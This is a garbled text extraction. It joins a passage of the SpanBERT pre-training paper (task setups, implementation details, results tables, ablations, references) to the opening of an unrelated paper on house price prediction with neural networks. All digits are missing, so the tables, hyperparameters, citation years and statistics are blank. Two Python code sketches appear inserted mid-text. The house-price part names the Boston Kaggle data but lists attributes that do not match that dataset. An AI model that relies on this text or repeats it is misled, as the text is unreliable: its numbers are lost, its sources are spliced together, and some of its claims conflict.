mrqa changed the original datasets to unify them into the same format, e.g., all the contexts are truncated to a maximum of tokens and only answerable questions are kept. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/mrqa/mrqa-shared-task- https://github.com/mrqa/mrqa-shared-task- answer span to be the special token [cls] for both training and testing. coreference resolution coreference resolu- tion is the task of clustering mentions in text which refer to the same real-world entities. we evaluate on the conll- shared task (pradhan et al., ) for document-level coreference resolu- tion. we use the independent version of the joshi et al. ( b) implementation of the higher-order coreference model (lee et al., ). the docu- ment is divided into non-overlapping segments of a pre-defined length. each segment is encoded independently by the pre-trained transformer encoder, which replaces the original lstm-based encoder. for each mention span x, the model learns a distribution p(·) over possible antecedent spans y : p(y) = es(x,y) ∑ y′∈y e s(x,y′) the span pair scoring function s(x, y) is a feed- forward neural network over fixed-length span representations and hand-engineered features over x and y: s(x, y) = sm(x) + sm(y) + sc(x, y) sm(x) = ffnn m(gx) sc(x, y) = ffnn c(gx, gy, φ(x, y)) here gx and gy denote the span representations, which are a concatenation of the two transformer output states of the span endpoints and an attention vector computed over the output representations of the token in the span. ffnnm and ffnnc represent two feedforward neural networks with one hidden layer, and φ(x, y) represents the hand- engineered features (e.g., speaker and genre infor- mation). a more detailed description of the model can be found in joshi et al. ( b). relation extraction tacred (zhang et al., ) is a challenging relation extraction dataset. given one sentence and two spans within it— subject and object—the task is to predict the relation between the spans from pre-defined relation types, including no relation. we follow the entity masking schema from zhang et al. ( ) and replace the subject and object entities by their ner tags such as ‘‘[cls][subj-per] the length was chosen from { , , , }. see more details in appendix b. was born in [obj-loc] , michigan, . . . ’’, and finally add a linear classifier on top of the [cls] token to predict the relation type. glue the general language understanding evaluation (glue) benchmark (wang et al., ) consists of sentence-level classification tasks: • two sentence-level classification tasks in- cluding cola (warstadt et al., ) for evaluating linguistic acceptability and sst- (socher et al., ) for sentiment classification. • three sentence-pair similarity tasks includ- ing mrpc (dolan and brockett, ), a binary paraphrasing task sentence pairs from news sources, sts-b (cer et al., ), a graded similarity task for news headlines, and qqp, a binary paraphrasing tasking be- tween quora question pairs. • four natural language inference tasks in- cluding mnli (williams et al., ), qnli (rajpurkar et al., ), rte (dagan et al., ; bar-haim et al., ; giampiccolo et al., ), and wnli (levesque et al., ). unlike question answering, coreference resolu- tion, and relation extraction, these sentence-level tasks do not require explicit modeling of span- level semantics. however, they might still benefit from implicit span-based reasoning (e.g., the prime minister is the head of the government). 
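returning to the coreference model described above, the following sketch renders the span-pair scoring equations in code. dimensions, hidden sizes, the relu activation, and all names are assumptions, and the full model additionally prunes candidate antecedents and includes a dummy antecedent; those parts are omitted here.

import torch
import torch.nn as nn

class AntecedentScorer(nn.Module):
    # s(x, y) = s_m(x) + s_m(y) + s_c(x, y), normalized with a softmax over the candidate antecedents
    def __init__(self, span_dim, feat_dim, hidden=150):
        super().__init__()
        self.ffnn_m = nn.Sequential(nn.Linear(span_dim, hidden), nn.ReLU(), nn.Linear(hidden, 1))
        self.ffnn_c = nn.Sequential(nn.Linear(2 * span_dim + feat_dim, hidden), nn.ReLU(), nn.Linear(hidden, 1))

    def forward(self, g_x, g_y, phi):
        # g_x: representation of mention x, shape (1, span_dim)
        # g_y: representations of the candidate antecedents, shape (k, span_dim)
        # phi: hand-engineered features phi(x, y) such as speaker and genre, shape (k, feat_dim)
        s_m_x = self.ffnn_m(g_x)                                       # mention score of x
        s_m_y = self.ffnn_m(g_y)                                       # mention score of each candidate
        s_c = self.ffnn_c(torch.cat([g_x.expand_as(g_y), g_y, phi], dim=-1))
        scores = (s_m_x + s_m_y + s_c).squeeze(-1)                     # one score per candidate
        return torch.softmax(scores, dim=-1)                           # p(y) over the candidates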
following previous work (devlin et al., ; radford et al., ), we exclude wnli from the results to enable a fair comparison. although recent work liu et al. ( a) has applied several task-specific strategies to increase performance on the individual glue tasks, we follow bert’s single-task setting and only add a linear classi- fier on top of the [cls] token for these classifi- cation tasks. . implementation we reimplemented bert’s model and pre- training method in fairseq (ott et al., ). https://data.quora.com/first-quora- dataset-release-question-pairs. previous work has excluded wnli on account of con- struction issues outlined on the glue website – https:// gluebenchmark.com/faq. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://data.quora.com/first-quora-dataset-release-question-pairs https://data.quora.com/first-quora-dataset-release-question-pairs https://gluebenchmark.com/faq https://gluebenchmark.com/faq we used the model configuration of bertlarge as in devlin et al. ( ) and also pre-trained all our models on the same corpus: bookscorpus and english wikipedia using cased wordpiece tokens. compared with the original bert implemen- tation, the main differences in our implementation include: (a) we use different masks at each epoch while bert samples different masks for each sequence during data processing. (b) we remove all the short-sequence strategies used before (they sampled shorter sequences with a small proba- bility . ; they also first pre-trained with smaller sequence length of for % of the steps). instead, we always take sequences of up to tokens until it reaches a document boundary. we refer readers to liu et al. ( b) for further dis- cussion on these modifications and their effects. as in bert, the learning rate is warmed up over the first , steps to a peak value of e- , and then linearly decayed. we retain β hyper- parameters (β = . , β = . ) and a de- coupled weight decay (loshchilov and hutter, ) of . . we also keep a dropout of . on all layers and attention weights, and a gelu ac- tivation function (hendrycks and gimpel, ). we deviate from the optimization by running for . m steps and using an epsilon of e- for adamw (kingma and ba, ), which con- verges to a better set of model parameters. our im- plementation uses a batch size of sequences with a maximum of tokens. for the sbo, we use dimension position embeddings p , p , . . . to mark positions relative to the left boundary token. the pre-training was done on volta v gpus and took days to complete. fine-tuning is implemented based on hugging- face’s codebase (wolf et al., ) and more details are given in appendix b. . baselines we compare spanbert to three baselines: google bert the pre-trained models released by devlin et al. ( ). our bert our reimplementation of bert with improved data preprocessing and optimiza- tion (section . ). on the average, this is approximately sequences, because some documents have fewer than tokens. https://github.com/google-research/bert. squad . squad . em f em f human perf. . . . . google bert . . . . our bert . . . . our bert- seq . . . . spanbert . . . . table : test results on squad . and squad . . our bert- seq our reimplementation of bert trained on single full-length sequences without nsp (section . ). results we compare spanbert to the baselines per task, and draw conclusions based on the overall trends. . per-task results extractive question answering table shows the performance on both squad . and . . 
spanbert exceeds our bert baseline by . % and . % f , respectively ( . % and . % over google bert). in squad . , this result ac- counts for over % error reduction, reaching . % f above human performance. table demonstrates that this trend goes be- yond squad, and is consistent in every mrqa dataset. on average, we see a . % f improve- ment from our reimplementation of bert. al- though some gains are coming from single-sequence training (+ . %), most of the improvement stems from span masking and the span boundary objec- tive (+ . %), with particularly large gains on triviaqa (+ . %) and hotpotqa (+ . %). coreference resolution table shows the performance on the ontonotes coreference res- olution benchmark. our bert reimplementation improves the google bert model by . % on the average f metric and single-sequence train- ing brings another . % gain. finally, spanbert improves considerably on top of that, achieving a new state of the art of . % f (previous best result is . %). relation extraction table shows the perfor- mance on tacred. spanbert exceeds our reimplementation of bert by . % f and achieves close to the current state of the art (soares et al., )—our model performs better than downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/google-research/bert newsqa triviaqa searchqa hotpotqa natural questions avg. google bert . . . . . . our bert . . . . . . our bert- seq . . . . . . spanbert . . . . . . table : performance (f ) on the five mrqa extractive question answering tasks. muc b ceafφ p r f p r f p r f avg. f prev. sota: (lee et al., ) . . . . . . . . . . google bert . . . . . . . . . . our bert . . . . . . . . . . our bert- seq . . . . . . . . . . spanbert . . . . . . . . . . table : performance on the ontonotes coreference resolution benchmark. the main evaluation is the average f of three metrics: muc, b , and ceafφ on the test set. p r f bertem(soares et al., ) − − . bertem+mtb∗ − − . google bert . . . our bert . . . our bert- seq . . . spanbert . . . table : test performance on the tacred relation extraction benchmark. bertlarge and bertem+mtb from soares et al. ( ) are the current state-of-the-art. ∗: bertem+mtb incor- porated an intermediate ‘‘matching the blanks’’ pre-training on the entity-linked text based on english wikipedia, which is not a direct compar- ison to ours trained only from raw text. their bertem but is . point behind bertem + mtb, which used entity-linked text for additional pre-training. most of this gain (+ . %) stems from single-sequence training although the contribution of span masking and the span boundary objective is still a considerable . %, resulting largely from higher recall. glue table shows the performance on glue. for most tasks, the different models appear to perform similarly. moving to single-sequence training without the nsp objective substantially improves cola, and yields smaller (but consid- erable) improvements on mrpc and mnli. the main gains from spanbert are in the squad- based qnli dataset (+ . %) and in rte (+ . %), the latter accounting for most of the rise in spanbert’s glue average. . overall trends we compared our approach to three bert base- lines on benchmarks, and found that spanbert outperforms bert on almost every task. in tasks, spanbert performed better than all base- lines. in two tasks (mrpc and qqp), it performed on-par in terms of accuracy with single-sequence trained bert, but still outperformed the other baselines. 
in one task (sst- ), google’s bert baseline performed better than spanbert by . % accuracy. when considering the magnitude of the gains, it appears that spanbert is especially better at extractive question answering. in squad . , for example, we observe a solid gain of . % f even though the baseline is already well above human performance. on mrqa, spanbert im- proves between . % (natural questions) and . % (triviaqa) f on top of our bert baseline. finally, we observe that single-sequence train- ing works considerably better than bi-sequence downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april cola sst- mrpc sts-b qqp mnli qnli rte (avg) google bert . . . / . . / . . / . . / . . . . our bert . . . / . . / . . / . . / . . . . our bert- seq . . . / . . / . . / . . / . . . . spanbert . . . / . . / . . / . . / . . . . table : test set performance on glue tasks. mrpc: f /accuracy, sts-b: pearson/spearmanr correlation, qqp: f /accuracy, mnli: matched/mistached accuracies, and accuracy for all the other tasks. wnli (not shown) is always set to majority class ( . % accuracy) and included in the average. training with nsp with bert’s choice of se- quence lengths for a wide variety of tasks. this is surprising because bert’s ablations showed gains from the nsp objective (devlin et al., ). however, the ablation studies still involved bi- sequence data processing (i.e., the pre-training stage only controlled for the nsp objective while still sampling two half-length sequences). we hy- pothesize that bi-sequence training, as it is im- plemented in bert (see section ), impedes the model from learning longer-range features, and consequently hurts performance on many down- stream tasks. ablation studies we compare our random span masking scheme with linguistically-informed masking schemes, and find that masking random spans is a com- petitive and often better approach. we then study the impact of the sbo, and contrast it with bert’s nsp objective. . masking schemes previous work (sun et al., ) has shown im- provements in downstream task performance by masking linguistically informed spans during pre- training for chinese data. we compare our ran- dom span masking scheme with masking of linguistically informed spans. specifically, we train the following five baseline models differing only in the way tokens are masked. subword tokens we sample random word- piece tokens, as in the original bert. whole words we sample random words, and then mask all of the subword tokens in those words. the total number of masked subtokens is around %. to save time and resources, we use the checkpoints at . m steps for all the ablation experiments. named entities at % of the time, we sample from named entities in the text, and sample random whole words for the other %. the total number of masked subtokens is %. specifically, we run spacy’s named entity recognizer (honnibal and montani, ) on the corpus and select all the non-numerical named entity mentions as candidates. noun phrases similar to named entities, we sample from noun phrases at % of the time. the noun phrases are extracted by running spacy’s constituency parser. geometric spans we sample random spans from a geometric distribution, as in our spanbert (see section . ). table shows how different pre-training masking schemes affect performance on the devel- opment set of a selection of tasks. 
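for concreteness, the sketch below shows how the geometric-spans scheme (the one spanbert itself uses) could draw a masked span set. p = 0.2 with spans clipped at 10 words matches the published spanbert configuration, but treat these values, the 15% budget, and the budget-clipping rule at the end of each iteration as defaults assumed by this sketch rather than an exact reproduction of the ablation setup.

import numpy as np

def sample_geometric_spans(num_words, budget_ratio=0.15, p=0.2, max_len=10, seed=None):
    # draw word-level span lengths from geo(p), clipped at max_len, until the masking budget is spent
    rng = np.random.default_rng(seed)
    budget = int(round(budget_ratio * num_words))
    masked = set()
    while len(masked) < budget:
        length = min(int(rng.geometric(p)), max_len)          # skewed towards shorter spans
        length = min(length, budget - len(masked))            # assumption: never overshoot the budget
        start = int(rng.integers(0, num_words - length + 1))  # uniformly chosen starting word
        masked.update(range(start, start + length))
    return sorted(masked)                                     # word indices to mask as whole spans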
all the mod- els are evaluated on the development sets and are based on the default bert setup of bi-sequence training with nsp; the results are not directly com- parable to the main evaluation. with the exception of coreference resolution, masking random spans is preferable to other strategies. although linguis- tic masking schemes (named entities and noun phrases) are often competitive with random spans, their performance is not consistent; for instance, masking noun phrases achieves parity with ran- dom spans on newsqa, but underperforms on triviaqa (− . % f ). on coreference resolution, we see that masking random subword tokens is preferable to any form of span masking. nevertheless, we shall see in the following experiment that combining random span masking with the span boundary objective can improve upon this result considerably. . auxiliary objectives in section , we saw that bi-sequence training with the nsp objective can hurt performance on https://spacy.io/. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://spacy.io/ squad . newsqa triviaqa coreference mnli-m qnli glue (avg) subword tokens . . . . . . . whole words . . . . . . . named entities . . . . . . . noun phrases . . . . . . . geometric spans . . . . . . . table : the effect of replacing bert’s original masking scheme (subword tokens) with different masking schemes. results are f scores for qa tasks and accuracy for mnli and qnli on the development sets. all the models are based on bi-sequence training with nsp. squad . newsqa triviaqa coref mnli-m qnli glue (avg) span masking ( seq) + nsp . . . . . . . span masking ( seq) . . . . . . . span masking ( seq) + sbo . . . . . . . table : the effects of different auxiliary objectives, given mlm over random spans as the primary objective. downstream tasks, when compared with single- sequence training. we test whether this holds true for models pre-trained with span masking, and also evaluate the effect of replacing the nsp objective with the sbo. table confirms that single-sequence training typically improves performance. adding sbo fur- ther improves performance, with a substantial gain on coreference resolution (+ . % f ) over span masking alone. unlike the nsp objective, sbo does not appear to have any adverse effects. related work pre-trained contextualized word representations that can be trained from unlabeled text (dai and le, ; melamud et al., ; peters et al., ) have had immense impact on nlp lately, partic- ularly as methods for initializing a large model before fine-tuning it for a specific task (howard and ruder, ; radford et al., ; devlin et al., ). beyond differences in model hyper- parameters and corpora, these methods mainly differ in their pre-training tasks and loss functions, with a considerable amount of contemporary liter- ature proposing augmentations of bert’s mlm objective. while previous and concurrent work has looked at masking (sun et al., ) or dropping (song et al., ; chan et al., ) multiple words from the input—particularly as pretraining for lan- guage generation tasks—spanbert pretrains span representations (lee et al., ), which are widely used for question answering, coreference resolution, and a variety of other tasks. ernie (sun et al., ) shows improvements on chinese nlp tasks using phrase and named entity mask- ing. 
mass (song et al., ) focuses on language generation tasks, and adopts the encoder-decoder framework to reconstruct a sentence fragment given the remaining part of the sentence. we attempt to more explicitly model spans using the sbo objective, and show that (geometrically dis- tributed) random span masking works as well, and sometimes better than, masking linguistically- coherent spans. we evaluate on english bench- marks for question answering, relation extraction, and coreference resolution in addition to glue. a different ernie (zhang et al., ) fo- cuses on integrating structured knowledge bases with contextualized representations with an eye on knowledge-driven tasks like entity typing and re- lation classification. unilm (dong et al., ) uses multiple language modeling objectives— unidirectional (both left-to-right and right-to-left), bidirectional, and sequence-to-sequence prediction— to aid generation tasks like summarization and question generation. xlm (lample and conneau, ) explores cross-lingual pre-training for multi- lingual tasks such as translation and cross-lingual classification. kermit (chan et al., ), an in- sertion based approach, fills in missing tokens downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april (instead of predicting masked ones) during pre- training; they show improvements on machine translation and zero-shot question answering. concurrent with our work, roberta (liu et al., b) presents a replication study of bert pre-training that measures the impact of many key hyperparameters and training data size. also concurrent, xlnet (yang et al., ) combines an autoregressive loss and the transformer-xl (dai et al., ) architecture with a more than an eight-fold increase in data to achieve current state- of-the-art results on multiple benchmarks. xlnet also masks spans (of – tokens) during pre- training, but predicts them autoregressively. our model focuses on incorporating span-based pre- training, and as a side effect, we present a stronger bert baseline while controlling for the corpus, architecture, and the number of parameters. related to our sbo objective, pair vec (joshi et al., a) encodes word-pair relations using a negative sampling-based multivariate objective during pre-training. later, the word-pair repre- sentations are injected into the attention-layer of downstream tasks, and thus encode limited down- stream context. unlike pair vec, our sbo objec- tive yields ‘‘pair’’ (start and end tokens of spans) representations which more fully encode the con- text during both pre-training and finetuning, and are thus more appropriately viewed as span repre- sentations. stern et al. ( ) focus on improving language generation speed using a block-wise par- allel decoding scheme; they make predictions for multiple time steps in parallel and then back off to the longest prefix validated by a scoring model. also related are sentence representation methods (kiros et al., ; logeswaran and lee, ), which focus on predicting surrounding contexts from sentence embeddings. conclusion we presented a new method for span-based pre- training which extends bert by ( ) masking contiguous random spans, rather than random tokens, and ( ) training the span boundary repre- sentations to predict the entire content of the masked span, without relying on the individual token representations within it. 
together, our pre- training process yields models that outperform all bert baselines on a variety of tasks, and reach substantially better performance on span selection tasks in particular. appendices a pre-training procedure we describe our pre-training procedure as follows: . divide the corpus into single contiguous blocks of up to tokens. . at each step of pre-training: (a) sample a batch of blocks uniformly at random. (b) mask % of word pieces in each block in the batch using the span masking scheme (section . ). (c) for each masked token xi, opti- mize l(xi) = lmlm(xi) + lsbo(xi) (section . ). b fine-tuning hyperparameters we apply the following fine-tuning hyperparam- eters to all methods, including the baselines. extractive question answering for all the question answering tasks, we use max seq length = and a sliding window of size if the lengths are longer than . we choose learning rates from { e- , e- , e- , e- , e- } and batch sizes from { , } and fine-tune four epochs for all the datasets. coreference resolution we divide the docu- ments into multiple chunks of lengths up to max seq length and encode each chunk indepen- dently. we choose max seq length from { , , , }, bert learning rates from { e- , e- }, task-specific learning rates from { e- , e- , e- }, and fine-tune epochs for all the datasets. we use batch size = (one document) for all the experiments. tacred/glue we use max seq length = and choose learning rates from { e- , e- , e- , e- , e- } and batch sizes from { , } and fine-tuning epochs for all the datasets. the only exception is cola, where we used four epochs (following devlin et al., ), because epochs lead to severe overfitting. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april acknowledgments we would like to thank pranav rajpurkar and robin jia for patiently helping us evaluate spanbert on squad. we thank the anonymous reviewers, the action editor, and our colleagues at facebook ai research and the university of washington for their insightful feedback that helped improve the paper. references jimmy lei ba, jamie ryan kiros, and geoffrey e. hinton. . layer normalization. arxiv pre- print arxiv: . . roy bar-haim, ido dagan, bill dolan, lisa ferro, danilo giampiccolo, bernardo magnini, and idan szpektor. . the second pascal recognising textual entailment challenge. in proceedings of the second pascal challenges workshop on recognising textual entailment, pages – . daniel cer, mona diab, eneko agirre, iãśigo lopez-gazpio, and lucia specia. . semeval- task : semantic textual similar- ity multilingual and crosslingual focused eval- uation. in international workshop on semantic evaluation (semeval), pages – . vancouver, canada. william chan, nikita kitaev, kelvin guu, mitchell stern, and jakob uszkoreit. . kermit: generative insertion-based modeling for sequences. arxiv preprint arxiv: . . ido dagan, oren glickman, and bernardo magnini. . the pascal recognising tex- tual entailment challenge. in machine learning challenges workshop, pages – . springer. andrew m. dai and quoc v. le. . semi- supervised sequence learning. in advances in neural information processing systems (nips), pages – . zihang dai, zhilin yang, yiming yang, william w. cohen, jaime carbonell, quoc v. le, and ruslan salakhutdinov. . transformer-xl: attentive language models beyond a fixed- length context. in association for computa- tional linguistics (acl). jacob devlin, ming-wei chang, kenton lee, and kristina toutanova. . 
bert: pre-training of deep bidirectional transformers for language understanding. in north american association for computational linguistics (naacl). william b. dolan and chris brockett. . automatically constructing a corpus of sen- tential paraphrases. in proceedings of the inter- national workshop on paraphrasing. li dong, nan yang, wenhui wang, furu wei, xiaodong liu, yu wang, jianfeng gao, ming zhou, and hsiao-wuen hon. . unified language model pre-training for natural lan- guage understanding and generation. in ad- vances in neural information processing systems (nips). matthew dunn, levent sagun, mike higgins, v. ugur guney, volkan cirik, and kyunghyun cho. . searchqa: a new q&a dataset augmented with context from a search engine. arxiv preprint arxiv: . . adam fisch, alon talmor, robin jia, minjoon seo, eunsol choi, and danqi chen. . mrqa shared task: evaluating general- ization in reading comprehension. in proceed- ings of nd machine reading for reading comprehension (mrqa) workshop at emnlp. danilo giampiccolo, bernardo magnini, ido dagan, and bill dolan. . the third pascal recognizing textual entailment challenge. in pro- ceedings of the acl-pascal workshop on tex- tual entailment and paraphrasing, pages – . luheng he, kenton lee, omer levy, and luke zettlemoyer. . jointly predicting predicates and arguments in neural semantic role labeling. in association for computational linguistics (acl), pages – . dan hendrycks and kevin gimpel. . gaussian error linear units (gelus). arxiv pre- print arxiv: . . matthew honnibal and ines montani. . spacy : natural language understanding with bloom embeddings, convolutional neural networks and incremental parsing. to appear. jeremy howard and sebastian ruder. . uni- versal language model fine-tuning for text clas- sification. arxiv preprint arxiv: . . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april mandar joshi, eunsol choi, omer levy, daniel weld, and luke zettlemoyer. a. pair vec: compositional word-pair embeddings for cross-sentence inference. in north american association for computational linguistics (naacl), pages – . mandar joshi, eunsol choi, daniel weld, and luke zettlemoyer. . triviaqa: a large scale distantly supervised challenge dataset for reading comprehension. in association for com- putational linguistics (acl), pages – . mandar joshi, omer levy, daniel s. weld, luke zettlemoyer, and omer levy. b. bert for coreference resolution: baselines and analysis. in empirical methods in natural language processing (emnlp). diederik kingma and jimmy ba. . adam: a method for stochastic optimization. in inter- national conference on learning representa- tions (iclr). ryan kiros, yukun zhu, ruslan r. salakhutdinov, richard s. zemel, antonio torralba, raquel urtasun, and sanja fidler. . skip-thought vectors. in advances in neural information processing systems (nips). tom kwiatkowski, jennimaria palomaki, olivia redfield, michael collins, ankur parikh, chris alberti, danielle epstein, illia polosukhin, matthew kelcey, jacob devlin, kenton lee, kristina n. toutanova, llion jones, ming- wei chang, andrew dai, jakob uszkoreit, quoc le, and slav petrov. . natural questions: a benchmark for question answering research. transactions of the association of computational linguistics (tacl). guillaume lample and alexis conneau. . cross-lingual language model pretraining. advances in neural information processing systems (nips). kenton lee, luheng he, mike lewis, and luke zettlemoyer. . 
end-to-end neural coreference resolution. in empirical methods in natural language processing (emnlp), pages – . kenton lee, luheng he, and luke zettlemoyer. . higher-order coreference resolution with coarse-to-fine inference. in north american association for computational linguistics (naacl), pages – . kenton lee, shimi salant, tom kwiatkowski, ankur parikh, dipanjan das, and jonathan berant. . learning recurrent span repre- sentations for extractive question answering. arxiv preprint arxiv: . . hector j. levesque, ernest davis, and leora morgenstern. . the winograd schema challenge. in aaai spring symposium: logical formalizations of commonsense reasoning, volume , page . xiaodong liu, pengcheng he, weizhu chen, and jianfeng gao. a. multi-task deep neural networks for natural language understanding. in proceedings of the th annual meeting of the association for computational linguistics. as- sociation for computational linguistics (acl). yinhan liu, myle ott, naman goyal, jingfei du, mandar joshi, danqi chen, omer levy, mike lewis, luke zettlemoyer, and veselin stoyanov. b. roberta: a robustly opti- mized bert pretraining approach. arxiv pre- print arxiv: . . lajanugen logeswaran and honglak lee. . an efficient framework for learning sentence representations. arxiv preprint arxiv: . . ilya loshchilov and frank hutter. . decou- pled weight decay regularization. in interna- tional conference on learning representations (iclr). oren melamud, jacob goldberger, and ido dagan. . context vec: learning generic context embedding with bidirectional lstm. in com- putational natural language learning (conll), pages – . myle ott, sergey edunov, alexei baevski, angela fan, sam gross, nathan ng, david grangier, and michael auli. . fairseq: a fast, exten- sible toolkit for sequence modeling. in north american association for computational lin- guistics (naacl), pages – . matthew peters, mark neumann, mohit iyyer, matt gardner, christopher clark, kenton lee, downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april and luke zettlemoyer. . deep contextual- ized word representations. in north american association for computational linguistics (naacl), pages – . sameer pradhan, alessandro moschitti, nianwen xue, olga uryupina, and yuchen zhang. . conll- shared task: modeling multi- lingual unrestricted coreference in ontonotes. in joint conference on emnlp and conll- shared task, pages – . ofir press and lior wolf. . using the out- put embedding to improve language models. in proceedings of the th conference of the european chapter of the association for com- putational linguistics: volume , short papers, pages – . association for computational linguistics (acl). alec radford, karthik narasimhan, time salimans, and ilya sutskever. . improving language un- derstanding with unsupervised learning, openai. pranav rajpurkar, robin jia, and percy liang. . know what you don’t know: unanswer- able questions for squad. in association for computational linguistics (acl), pages – . pranav rajpurkar, jian zhang, konstantin lopyrev, and percy liang. . squad: , + questions for machine comprehension of text. in empirical methods in natural language processing (emnlp), pages – . livio baldini soares, nicholas arthur fitzgerald, jeffrey ling, and tom kwiatkowski. . matching the blanks: distributional similarity for relation learning. in association for compu- tational linguistics (acl), pages – . richard socher, alex perelygin, jean wu, jason chuang, christopher d. 
manning, andrew ng, and christopher potts. . recursive deep models for semantic compositionality over a sentiment treebank. in empirical methods in natural language processing (emnlp), pages – . kaitao song, xu tan, tao qin, jianfeng lu, and tie-yan liu. . mass: masked se- quence to sequence pre-training for language generation. in international conference on machine learning (icml), pages – . mitchell stern, noam shazeer, and jakob uszkoreit. . blockwise parallel decod- ing for deep autoregressive models. in advances in neural information processing systems (nips). yu stephanie sun, shuohuan wang, yukun li, shikun feng, xuyi chen, han zhang, xinlun tian, danxiang zhu, hao tian, and hua wu. . ernie: enhanced representation through knowledge integration. arxiv preprint arxiv: . . adam trischler, tong wang, xingdi yuan, justin harris, alessandro sordoni, philip bachman, and kaheer suleman. . newsqa: a ma- chine comprehension dataset. in nd work- shop on representation learning for nlp, pages – . ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n. gomez, Łukasz kaiser, and illia polosukhin. . attention is all you need. in advances in neural information processing systems (nips). alex wang, amapreet singh, julian michael, felix hill, omer levy, and samuel r. bowman. . glue: a multi-task benchmark and anal- ysis platform for natural language understand- ing. in international conference on learning representations (iclr). alex warstadt, amanpreet singh, and samuel r. bowman. . neural network acceptability judgments. arxiv preprint arxiv: . . adina williams, nikita nangia, and samuel bowman. . a broad-coverage challenge corpus for sentence understanding through in- ference. in north american association for com- putational linguistics (naacl), pages – . thomas wolf, lysandre debut, victor sanh, julien chaumond, clement delangue, anthony moi, pierric cistac, tim rault, r’emi louf, morgan funtowicz, and jamie brew. . huggingface’s transformers: state-of-the-art natural language processing. arxiv preprint arxiv: . . zhilin yang, zihang dai, yiming yang, jaime carbonell, ruslan salakhutdinov, and quoc v. le. . xlnet: generalized autoregressive downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april pretraining for language understanding. in advances in neural information processing systems (neurips). zhilin yang, peng qi, saizheng zhang, yoshua bengio, william cohen, ruslan salakhutdinov, and christopher d. manning. . hotpotqa: a dataset for diverse, explainable multi-hop question answering. in empirical methods in natural language processing (emnlp), pages – . yuhao zhang, victor zhong, danqi chen, gabor angeli, and christopher d. manning. . position-aware attention and supervised data improve slot filling. in empirical methods in natural language processing (emnlp), pages – . zhengyan zhang, xu han, zhiyuan liu, xin jiang, maosong sun, and qun liu. . ernie: enhanced language representation with informative entities. in association for compu- tational linguistics (acl), pages – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . 
international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- -

research on house price prediction based on multi-dimensional data fusion

yang yonghui, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: yangyh @qq.com

abstract—the price of commercial housing is related to the process of urbanization in china and to the living standard of residents, so predicting the price of commercial housing is important. a major difficulty in regression prediction problems is how to handle different attribute types and how to fuse them. this paper proposes a house price prediction model based on multi-dimensional data fusion and a fully connected neural network. the model is built in four steps: first, normalize the data involved in the sample; then, interpolate the normalized data to increase the data density; subsequently, convert the normalized sample data into a pixel matrix; finally, establish a fully connected neural network model from the pixel matrix to the price of the commercial house. after the neural network model has been established, the price of a house can be obtained by entering the attributes of the house into the neural network model.

keywords-multi-dimensional data fusion; fully connected neural network model; house price prediction

i. introduction

urbanization[ ] refers to the process of population gathering towards cities, the expansion of cities, and the series of economic and social changes that result from it; its essence is change in economic, social, and spatial structures. urbanization is a core proposition of china's modernization process and of sustained economic growth. in recent years, with the further progress of china's urbanization, more and more young people have begun to move to second-tier, third-tier and even first-tier cities. a major factor affecting young people's entry into big cities is the price of local commercial housing; in other words, a major factor affecting china's urbanization process is the price of urban housing. this shows that it is necessary to forecast house prices. the attributes that affect house prices considered here are the transaction date, house age, distance from the subway station, the number of convenience stores in the walking circle, the dimension of the house, and the longitude of the house. this paper builds a data fusion model whose input is these six factors that affect house prices and whose output is the price of commercial housing. after the data fusion model has been established, only the attributes that affect house prices need to be entered into the data fusion model to obtain the price of the commercial house.

a. research background and significance

with the development of china's economy, people's living standards have gradually improved, and economic development has given people higher expectations for their places of living.
according to data from the national bureau of statistics[ ]: from january to december , the investment in real estate development nationwide was , . billion yuan, an increase of . % over the previous year, and the growth rate was . percentage points lower than the january- november period, an increase from the same period of the previous year. . percentage points. among them, residential investment was , . billion yuan, an increase of . %, a . percentage point drop from january to november, and an increase of percentage points from the previous year. the proportion of residential investment in real estate development investment was . %. with the increase in housing sales, housing prices have also increased. according to relevant data, china's housing prices have at least doubled from . with the increase of house prices, people pay more attention to the prediction of house prices. this paper will build a data fusion model. the input information of this model is six attributes that affect house prices: transaction date, house age, distance from the subway station, the number of convenience stores in the walking circle, the dimension of the house, and the longitude of the house; the output is the price of the commercial house. after the data mailto:yangyh @qq.com international journal of advanced network, monitoring and controls volume , no. , fusion model has been established, only the six attributes that affect house prices are entered into the data fusion model, and the price of the commercial house can be obtained. the research of house price prediction based on multi-dimensional data fusion can provide reference for china's house price prediction and further promote the development of urbanization in china. b. data sources the data in this paper comes from the boston house price data provided by kaggle, and the amount of data selected is relatively small. the data set contains training samples and test samples, for a total of sample data. there are attributes that affect house prices in house price forecasts. in the problem of house price prediction, the attributes that affect house prices are: transaction date , house age , distance from the subway station , the number of convenience stores in the walking circle , the dimension of the house , and the longitude of the house ; dependent variable is house price . ii. key technology a. research methods for regression problems house price forecasting is a forecasting problem, and forecasting problems are regression analysis. this section aims to state the research methods of regression analysis. regression analysis[ ] is a method of statistically analyzing data. the purpose is to understand whether two or more variables are related, the direction, and strength of the correlation and establish a mathematical model to observe specific variables to predict the variables of interest to researchers. the roles in regression analysis are independent and dependent variables: the independent variable is a variable that actively changes, for example, several factors that affect house prices in this paper are independent variables; the dependent variable is a passively generated due to changes in independent variables, such as housing prices in this paper, are a dependent variable. regression analysis can also be understood as a method for analyzing the relationship between independent and dependent variables. the regression analysis methods are linear regression, logistic regression, and polynomial stepwise regression. 
